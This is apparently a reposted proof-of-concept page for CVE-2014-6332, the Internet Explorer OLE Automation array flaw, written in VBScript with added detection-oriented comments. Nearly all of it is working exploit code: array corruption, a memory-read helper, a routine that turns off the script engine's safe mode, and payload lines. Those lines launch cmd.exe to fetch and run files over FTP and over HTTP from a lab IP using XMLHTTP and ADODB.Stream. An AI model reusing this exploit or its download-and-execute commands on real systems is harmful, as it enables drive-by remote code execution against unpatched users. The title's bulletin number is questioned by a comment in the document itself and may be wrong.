
MS14-065各种版本的poc

2014-11-21 13:55 585 查看
Internet Explorer < 11 - OLE Automation Array Remote Code Execution
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975

*//

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

' Payload stage, called from setnotsafemode(). The body consists only of process
' launches through COM automation objects, so its effect would appear in endpoint
' telemetry as the browser starting notepad.exe, cmd.exe, ftp.exe or cscript.exe.
' The author keeps three payload variants side by side: launch a program, fetch a
' file over FTP, fetch a file over HTTP.
' Detection notes:
'   - 127.0.0.1 and 172.16.22.100 are loopback / private lab addresses, not usable
'     network indicators; the process and file behaviour is the indicator.
'   - File artefacts named in the command lines: autoftp.cfg, d:\text.vbs,
'     d:\calc.exe, d:\putty.exe.
'   - On Error Resume Next suppresses runtime errors, so a blocked step fails
'     silently instead of raising a script error dialog.
function runmumaa() //修改各种版本修改这个函数的内容就可以了
On Error Resume Next
' Shell.Application is presumably refused to web-page script while the engine's
' safe-mode state is intact; this call relies on setnotsafemode() having run first.
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
//ftp版本
' FTP variant: cmd.exe is asked to write an ftp command script (autoftp.cfg), run
' ftp -s: against it, delete the script and start the fetched file from d:\.
shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"
//

//http下载版本
' HTTP variant: the command line appends a second-stage script to d:\text.vbs that
' uses Microsoft.XMLHTTP for the download and ADODB.Stream to save it; the script
' is then run with cscript.exe and the saved file is started after a 10 s wait.
objWsh.run "cmd.exe /c echo >>d:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>d:\text.vbs xPost.Open ""GET"",""http://172.16.22.100/putty.exe"",0 & echo >>d:\text.vbs xPost.Send() & echo >>d:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>d:\text.vbs sGet.Mode=3 & echo >>d:\text.vbs sGet.Type=1 & echo >>d:\text.vbs sGet.Open() & echo >>d:\text.vbs sGet.Write xPost.ResponseBody & echo >>d:\text.vbs sGet.SaveToFile ""d:\putty.exe"",2",0
objWsh.run "cscript.exe d:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "d:\putty.exe"

end function

</script>

<SCRIPT LANGUAGE="VBScript">

' Script-wide state for the CVE-2014-6332 proof of concept.
' NOTE(review): Microsoft's fix for CVE-2014-6332 is generally cited as bulletin
' MS14-064; the page title says MS14-065 - confirm before using the title for
' patch tracking.
' The enclosing page requests IE8 emulation through its X-UA-Compatible meta tag;
' presumably this keeps VBScript available in newer IE versions - confirm. A page
' that combines a legacy document mode with VBScript blocks is a useful
' content-inspection signal.

' Two dynamic arrays that are resized repeatedly by Over(), mydata() and ReadMemo().
dim   aa()
dim   ab()
' a0: current "normal" upper bound of aa; a1 = a0+2; a2 = a0+&h8000000 (set in Over()).
' a3: step added to a0 on every attempt (set in BeginInit()).
dim   a0
dim   a1
dim   a2
dim   a3
' Set to 1 by Over() when the second of its two marker values is observed.
dim   win9x
' Browser major version parsed from the user agent in Begin().
dim   intVersion
' rnda and funclass are declared but not referenced anywhere in the visible script.
dim   rnda
dim   funclass
' String assembled from raw code units in Begin() and stored through aa in mydata().
dim   myarray

' Runs as soon as the script block is evaluated: no click or other interaction
' after page load is involved.
Begin()

' Entry point: gates on the browser's user agent, attempts the array corruption
' and, on success, hands over to the version-specific follow-up.
' Analysis note: the user-agent gate exits silently for 64-bit ("Win64") and
' non-MSIE agents, so a sandbox or crawler presenting such an agent would observe
' no behaviour from this page.
function Begin()
On Error Resume Next
info=Navigator.UserAgent

' Exit without doing anything on a 64-bit user agent.
if(instr(info,"Win64")>0)   then
exit   function
end if

' Take the two characters after "MSIE " as the major version; exit on any
' agent that does not contain "MSIE".
if (instr(info,"MSIE")>0)   then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit   function

end if

win9x=0

BeginInit()
' Create() retries Over() until it reports that the out-of-bounds state was reached.
If Create()=True Then
' Twelve 16-bit code units given by value; presumably a hand-built array
' descriptor rather than text - it is later stored at aa(a1+2) in mydata().
myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

' Versions below 4 take a path through runshellcode(), which is not defined in
' the visible page; every other version goes through setnotsafemode().
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

' Seeds the random generator and picks the starting array size (a0) and the
' per-attempt growth step (a3). Because both values come from rnd(), array sizes
' differ between page loads, so signatures keyed on fixed sizes would not match.
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

' Retry loop around Over(): up to 401 attempts (i = 0 To 400), returning True on
' the first attempt that Over() reports as successful and False otherwise.
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
'   document.write(i)
Create=True
Exit For
End If
Next
end function

' Deliberately empty procedure. mydata() assigns it to a variable (i=testaa);
' the body itself never does any work.
sub testaa()
end sub

' Stores values through aa at indices a1 and a1+2, which lie above the a0 bound
' that Over() allocates, and returns what is then read back from aa(a1).
' The floating-point literals written to ab are presumably chosen for their raw
' bit patterns rather than their numeric value, so that they overlay the type
' fields of the neighbouring aa elements - confirm against a published analysis
' of CVE-2014-6332.
function mydata()
On Error Resume Next
i=testaa
i=null
' Switch aa to the oversized bound; errors from the resize are suppressed.
redim  Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
' Restore the normal bound before returning.
redim  Preserve aa(a0)
end function

' Follows a chain of values read with readmemo(), scans a fixed window of offsets
' for the value 14, overwrites the matching location with ab(4), then calls the
' payload function runmumaa().
' Judging by the function name, the overwritten value is the script engine's
' safe-mode state - confirm. The visible path from here to runmumaa() contains no
' injected machine code: it is a data-only change followed by ordinary COM calls,
' so detection has to rely on the resulting process and file behaviour.
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
' Scan offsets &h120 .. &h180 in steps of 4 for a location holding 14.
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim  Preserve aa(a2)
' ab(4) is never assigned in the visible script, so an empty value is written.
aa(a1+2)(i+&h11c+k)=ab(4)
redim  Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

' One attempt at reaching the out-of-bounds state. Returns True when the type
' read from aa(a1), an index above the allocated bound a0, equals one of two
' expected marker values; returns False otherwise.
' The function presumably relies on the CVE-2014-6332 condition: after the
' oversized "redim Preserve" fails under On Error Resume Next, indices up to a2
' are still accepted. On a patched system the probe below would not be expected
' to see the marker - confirm.
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
' Grow the working size on every attempt and derive the probe index (a1) and
' the oversized bound (a2) from it.
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim  Preserve aa(a0)
redim   ab(a0)

' Resize request with an enormous upper bound; any error is suppressed.
redim  Preserve aa(a2)

type1=1
' Distinctive double stored in ab(0); presumably the marker values tested at the
' end are fragments of this value seen through aa - confirm.
ab(0)=1.123456789012345678901234567890
aa(a0)=10

' Probe the elements just above a0. Versions below 4 apply an extra consistency
' check on the value seen at aa(a1-1) and give up on this attempt if it fails.
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0)  Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim  Preserve aa(a0)
exit  function

end if
else
if(vartype(aa(a1-1))<>0)  Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if

' Two accepted marker values; the second one also sets the win9x flag.
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

' Restore the normal bound before returning.
redim  Preserve aa(a0)

end function

' Read helper used by setnotsafemode(). Stores add+4 in aa(a1), an index above
' the allocated bound a0, writes a constant to ab(0), and returns LenB() of that
' element. Presumably the constant makes the stored integer be treated as a
' string, so that LenB() returns the 32-bit value located at address `add` -
' confirm against a published analysis.
function ReadMemo(add)
On Error Resume Next
' Switch aa to the oversized bound; errors from the resize are suppressed.
redim  Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

' Clear ab(0) again before shrinking aa back to its normal bound.
ab(0)=0

redim  Preserve aa(a0)
end function

</script>

</body>
</html>